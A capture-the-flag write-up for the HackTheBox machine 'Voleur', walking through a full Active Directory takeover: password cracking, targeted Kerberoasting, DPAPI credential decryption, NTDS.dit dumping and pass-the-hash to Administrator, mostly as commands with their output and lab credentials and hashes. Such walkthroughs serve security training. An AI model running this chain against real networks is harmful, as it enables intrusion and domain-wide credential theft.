> For the complete documentation index, see [llms.txt](https://xenon-2.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://xenon-2.gitbook.io/writeups/hackthebox/boxes/voleur.md). # Voleur ## User Setup `/etc/krb5.conf` for kerberos authentication with `voleur.htb` ```bash [libdefaults] default_realm = VOLEUR.HTB dns_lookup_realm = false dns_lookup_kdc = false ticket_lifetime = 24h forwardable = true [realms] VOLEUR.HTB = { kdc = 10.10.11.76 } [domain_realm] .voleur.htb = VOLEUR.HTB voleur.htb = VOLEUR.HTB ``` Set your `/etc/hosts` file appropriately ```bash 10.10.11.76 DC.voleur.htb voleur.htb ``` We can now request for a TGT using `kinit` and authenticate with kerberos ```bash kinit ryan.naylor ryan.naylor@VOLEUR.HTB's Password: klist Credentials cache: FILE:/tmp/krb5cc_1000 Principal: ryan.naylor@VOLEUR.HTB Issued Expires Principal Jul 7 06:27:07 2025 Jul 7 16:27:07 2025 krbtgt/VOLEUR.HTB@VOLEUR.HTB export KRB5CCNAME=/tmp/krb5cc_1000 klist Credentials cache: FILE:/tmp/krb5cc_1000 Principal: ryan.naylor@VOLEUR.HTB Issued Expires Principal Jul 7 06:27:07 2025 Jul 7 16:27:07 2025 krbtgt/VOLEUR.HTB@VOLEUR.HTB ``` We can enumerate shares which gives us a protected excel file that can be cracked with `office2john` ```bash office2john Access_Review.xlsx > hash.txt john --wordlist=/home/kali/Desktop/rockyou.txt hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES]) Cost 1 (MS Office version) is 2013 for all loaded hashes Cost 2 (iteration count) is 100000 for all loaded hashes Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status football1 (Access_Review.xlsx) 1g 0:00:00:01 DONE (2025-07-07 03:31) 0.7352g/s 611.7p/s 611.7c/s 611.7C/s football1..legolas Use the "--show" optio ``` The excel file gives us the following credentials `svc_ldap`:`M1XyC9pW7qT5Vn` `svc_iis`: `N5pXyW1VqM7CZ8` `todd.wolfe`: `NightT1meP1dg3on14` `svc_ldap` has `WriteSPN` over `svc_winrm`, and since there is no ADCS in the domain, we can make use of `targetedKerberoasting` ```bash bloodyAD -d voleur.htb --host dc.voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -k set object "svc_winrm" servicePrincipalName -v 'http/anything' [+] svc_winrm's servicePrincipalName has been updated netexec ldap DC.voleur.htb -u 'svc_ldap' -p 'M1XyC9pW7qT5Vn' -k --kerberoasting out.txt LDAP DC.voleur.htb 389 DC [*] None (name:DC) (domain:voleur.htb) LDAP DC.voleur.htb 389 DC [+] voleur.htb\svc_ldap:M1XyC9pW7qT5Vn LDAP DC.voleur.htb 389 DC [*] Skipping disabled account: krbtgt LDAP DC.voleur.htb 389 DC [*] Total of records returned 1 LDAP DC.voleur.htb 389 DC [*] sAMAccountName: svc_winrm, memberOf: CN=Remote Management Users,CN=Builtin,DC=voleur,DC=htb, pwdLastSet: 2025-01-31 17:10:12.398769, lastLogon: 2025-07-07 03:14:39.737268 LDAP DC.voleur.htb 389 DC $krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb\svc_winrm*$e3a804f76a893f34385ed7418ff6bb1b$e5bae5f9ae418386b4383c5c7ba483322d4e458fe3662c426deb5b6590ece022b7a367e63a1cf06ca5171ae996549757b69dcf94f2553f3311657ccd4bbbb5d54c132edea6f1a7317cb0adf569a53a03efc76d844acc0910c37c4c69578af0e1d201c1b4718b4e53179c6b1185a8432ffa268def1f2d3919adf5677002d2b15a36e5833e7932a019c0fdc40602c815b1e0ce39b096026e2e054707980a06baa993c071e7d2fd838a8394ec7cd2e03c06d7a0c3060238564e4261dec1aa3cd266f1c646e09c4e4a1d65a31bf347b43b6a61cd1c9b8fb5de7856def4b2d68e945c19d91d54ac88e531723e46ac7617d3c8b151853652d7e3e884ff635a5b9e449f2739aaa81c741b61dcffb0ad388bc5738dd1f6ff35f6e82b8c640f11c1ff3e93eb97e42195affbcc77727d40b134f8dbeea4b2bc96dbb75586e95f4a04342a4a97bdde1dc50bb21b038274c2dab482267d2ad99d106838e5cc90666b2c31bf93e1061d6f9fed33aeccdf2a4415c4c704e7b6be0e5421fcf57962b90f8b7822efccb58a2f957317cea0953e57abf8c258e65050d0f2b2cf203531d6f5848172b1d876d3f1d0a60e940aee3f146173523869d1d3718fee6d19bc31418ebd412d8c67ae242cc5663355af140cf1f2928d443b2e1232946bda92f58af40c9cb302dd6f41ff1cf2c9e54f96defbe5cbe99b05e9db652fcc6659bed5587e25e07b8403691ab57ffc0eaf1a7513a9454ee4d4e6f64733b4de99a72f2febcc51b7b2901344fc972d91cbc43480f6294382a3f8326674fa0a58ed7908318f3dc3be7d38d70874b6dd06412b13fa42f727e6ea6bf00d7ae0c52ddb4784040ca1c3aeb557c2d54f15cf4cc0297857f2507e069951eaacf388c64cb035addf2f16ab28546e94665cbba2dc337df3667f8d3287b0d846384287429b9800d2ba244c883ae45e299cb1f9b43835ed06fd74a14eed346ceba4d0fb658fd8055b66015b356bab48521fd05e6a2b00354a8b01b45f6ea6f002e5f3099e1827e5a4136a822533efadc14a03adad41884f2e250b2d2460e2a455c870b3ae3a8808e5f3416ded37a148ae337429b1b90f9e0f225f2d69e5d077c58a2ed303520520af30a5cb89203aa0300b18707320f0b94dc7e7e784dd5b10cbd8896e32b7e645eeb9625b49e67bad042c23b96b05e03d7ba89ddf41a2e3925f10b1984f16467bd8a27b9bcbb7bc489c286e2311d48c5aebc1da8d46ce5e9382c3f20091902011f42fab6cbd7bf379a195087e041aefb252d124dec55d39805d42e15ad5af894200628f4b7c9fb32eb5351fd373c7662eed0af45712cfc0a9487ba85ac9f89540234709c2851ab8a62ba072ad648f4542a18a30e20cbac6e8957e2031460dc8c3914fd608bb0832a795a84b9bceae358b13f5d8f5f7c512a668911678efe4c7228ef056166d286a983880ef6ee125c92e4dad23d8be00ff016d34a331 $krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb\svc_winrm*$:AFireInsidedeOzarctica980219afi ``` We can get user flag from svc\_winrm, using `kinit` to get a TGT for authentication with kerberos ```bash kinit svc_winrm svc_winrm@VOLEUR.HTB's Password: evil-winrm -i DC.voleur.htb -u svc_winrm -r voleur.htb Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Warning: User is not needed for Kerberos auth. Ticket will be used Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc_winrm\Documents> ``` ## Root `svc_ldap` is in the `Restore Users` group, which is hinted to be able to restore deleted user `Todd.wolfe` Getting a shell with `svc_ldap` using sliver and `runascs.exe` ```bash execute-assembly /home/kali/Desktop/HTB/Tools/precompiled-binaries/LateralMovement/RunasCs.exe svc_ldap M1XyC9pW7qT5Vn a.exe [*] Beacon bec3c39d OLD-FASHIONED_SHADOWBOX - 10.10.11.76:64050 (DC) - windows/amd64 - Mon, 07 Jul 2025 05:27:49 +08 ``` We can do the following to restore deleted objects {% code overflow="wrap" %} ```powershell PS C:\Windows\system32> Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects Deleted : True DistinguishedName : CN=Deleted Objects,DC=voleur,DC=htb Name : Deleted Objects ObjectClass : container ObjectGUID : 587cd8b4-6f6a-46d9-8bd4-8fb31d2e18d8 Deleted : True DistinguishedName : CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb Name : Todd Wolfe DEL:1c6b1deb-c372-4cbb-87b1-15031de169db ObjectClass : user ObjectGUID : 1c6b1deb-c372-4cbb-87b1-15031de169db PS C:\Windows\system32> Restore-ADObject -Identity 1c6b1deb-c372-4cbb-87b1-15031de169db Restore-ADObject -Identity 1c6b1deb-c372-4cbb-87b1-15031de169db PS C:\Windows\system32> Enable-ADAccount -Identity "Todd.Wolfe" Enable-ADAccount -Identity "Todd.Wolfe" ``` {% endcode %} We can test with `netexec` to see if we now have access to `Todd.Wolfe` using the password in excel `NightT1meP1dg3on14` ```bash netexec smb DC.voleur.htb -u 'Todd.Wolfe' -p NightT1meP1dg3on14 -k SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False) SMB DC.voleur.htb 445 DC [+] voleur.htb\Todd.Wolfe:NightT1meP1dg3on14 netexec smb DC.voleur.htb -u 'Todd.Wolfe' -p NightT1meP1dg3on14 -k --shares SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False) SMB DC.voleur.htb 445 DC [+] voleur.htb\Todd.Wolfe:NightT1meP1dg3on14 SMB DC.voleur.htb 445 DC [*] Enumerated shares SMB DC.voleur.htb 445 DC Share Permissions Remark SMB DC.voleur.htb 445 DC ----- ----------- ------ SMB DC.voleur.htb 445 DC ADMIN$ Remote Admin SMB DC.voleur.htb 445 DC C$ Default share SMB DC.voleur.htb 445 DC Finance SMB DC.voleur.htb 445 DC HR SMB DC.voleur.htb 445 DC IPC$ READ Remote IPC SMB DC.voleur.htb 445 DC IT READ SMB DC.voleur.htb 445 DC NETLOGON READ Logon server share SMB DC.voleur.htb 445 DC SYSVOL READ Logon server share ``` We can access the `IT` share again to get access to a archived home directory of `Todd.Wolfe` We can extract dpapi protected data using `impacket-dpapi` The masterkey is at `"C:\Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88` The credential blob is at `C:\Users\todd.wolfe\AppData\Roaming\Credentials\772275FAD58525253490A9B0039791D3` {% code overflow="wrap" %} ```bash impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -password NightT1meP1dg3on14 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [MASTERKEYFILE] Version : 2 (2) Guid : 08949382-134f-4c63-b93c-ce52efc0aa88 Flags : 0 (0) Policy : 0 (0) MasterKeyLen: 00000088 (136) BackupKeyLen: 00000068 (104) CredHistLen : 00000000 (0) DomainKeyLen: 00000174 (372) Decrypted key with User Key (MD4 protected) Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83 impacket-dpapi credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [CREDENTIAL] LastWritten : 2025-01-29 12:55:19 Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH) Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE) Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD) Target : Domain:target=Jezzas_Account Description : Unknown : Username : jeremy.combs Unknown : qT3V9pLXyN7W4m ``` {% endcode %} Enumerate shares once again, getting access to `svc_backup` ssh key as hinted in the excel note previously. There is also WSL ssh access on Port 2222. ```bash ssh -i id_rsa -p 2222 svc_backup@DC.voleur.htb Welcome to Ubuntu 20.04 LTS (GNU/Linux 4.4.0-20348-Microsoft x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Sun Jul 6 15:05:32 PDT 2025 System load: 0.52 Processes: 15 Usage of /home: unknown Users logged in: 0 Memory usage: 60% IPv4 address for eth0: 10.10.11.76 Swap usage: 3% 363 updates can be installed immediately. 257 of these updates are security updates. To see these additional updates run: apt list --upgradable The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Sun Jul 6 14:38:47 2025 from 10.10.11.76 * Starting OpenBSD Secure Shell server sshd [ OK ] svc_backup@DC:~$ ls svc_backup@DC:~$ whoami svc_backup ``` We can access the `\mnt` directory and accessing the `IT` share once again, we see copies of `SECURITY`, `SYSTEM` and `NTDS.dit` ```bash root@DC:/mnt/c/IT/Third-Line Support/Backups# ls 'Active Directory' registry root@DC:/mnt/c/IT/Third-Line Support/Backups# cd registry root@DC:/mnt/c/IT/Third-Line Support/Backups/registry# ls SECURITY SYSTEM ``` We can now dump the domain and get access via evil-winrm {% code overflow="wrap" %} ```bash impacket-secretsdump local -system SYSTEM -security SECURITY -ntds ntds.dit Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC $MACHINE.ACC:plain_password_hex:759d6c7b27b4c7c4feda8909bc656985b457ea8d7cee9e0be67971bcb648008804103df46ed40750e8d3be1a84b89be42a27e7c0e2d0f6437f8b3044e840735f37ba5359abae5fca8fe78959b667cd5a68f2a569b657ee43f9931e2fff61f9a6f2e239e384ec65e9e64e72c503bd86371ac800eb66d67f1bed955b3cf4fe7c46fca764fb98f5be358b62a9b02057f0eb5a17c1d67170dda9514d11f065accac76de1ccdb1dae5ead8aa58c639b69217c4287f3228a746b4e8fd56aea32e2e8172fbc19d2c8d8b16fc56b469d7b7b94db5cc967b9ea9d76cc7883ff2c854f76918562baacad873958a7964082c58287e2 $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77 [*] DPAPI_SYSTEM dpapi_machinekey:0x5d117895b83add68c59c7c48bb6db5923519f436 dpapi_userkey:0xdce451c1fdc323ee07272945e3e0013d5a07d1c3 [*] NL$KM 0000 06 6A DC 3B AE F7 34 91 73 0F 6C E0 55 FE A3 FF .j.;..4.s.l.U... 0010 30 31 90 0A E7 C6 12 01 08 5A D0 1E A5 BB D2 37 01.......Z.....7 0020 61 C3 FA 0D AF C9 94 4A 01 75 53 04 46 66 0A AC a......J.uS.Ff.. 0030 D8 99 1F D3 BE 53 0C CF 6E 2A 4E 74 F2 E9 F2 EB .....S..n*Nt.... NL$KM:066adc3baef73491730f6ce055fea3ff3031900ae7c61201085ad01ea5bbd23761c3fa0dafc9944a0175530446660aacd8991fd3be530ccf6e2a4e74f2e9f2eb [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Searching for pekList, be patient [*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40 [*] Reading and decrypting hashes from ntds.dit Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5aeef2c641148f9173d663be744e323c::: voleur.htb\ryan.naylor:1103:aad3b435b51404eeaad3b435b51404ee:3988a78c5a072b0a84065a809976ef16::: voleur.htb\marie.bryant:1104:aad3b435b51404eeaad3b435b51404ee:53978ec648d3670b1b83dd0b5052d5f8::: voleur.htb\lacey.miller:1105:aad3b435b51404eeaad3b435b51404ee:2ecfe5b9b7e1aa2df942dc108f749dd3::: voleur.htb\svc_ldap:1106:aad3b435b51404eeaad3b435b51404ee:0493398c124f7af8c1184f9dd80c1307::: voleur.htb\svc_backup:1107:aad3b435b51404eeaad3b435b51404ee:f44fe33f650443235b2798c72027c573::: voleur.htb\svc_iis:1108:aad3b435b51404eeaad3b435b51404ee:246566da92d43a35bdea2b0c18c89410::: voleur.htb\jeremy.combs:1109:aad3b435b51404eeaad3b435b51404ee:7b4c3ae2cbd5d74b7055b7f64c0b3b4c::: voleur.htb\svc_winrm:1601:aad3b435b51404eeaad3b435b51404ee:5d7e377177574 ``` {% endcode %} Use `impacket-getTGT` as we do not have the password of `Administrator` {% code overflow="wrap" %} ```bash impacket-getTGT voleur.htb/Administrator -hashes :e656e07c56d831611b577b160b259ad2 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Saving ticket in Administrator.ccache impacket-getTGT voleur.htb/Administrator -hashes :e656e07c56d831611b577b160b259ad2 export KRB5CCNAME=./Administrator.ccache evil-winrm -i dc.voleur.htb -u Administrator -r voleur.htb Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Warning: User is not needed for Kerberos auth. Ticket will be used Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> ``` {% endcode %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://xenon-2.gitbook.io/writeups/hackthebox/boxes/voleur.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.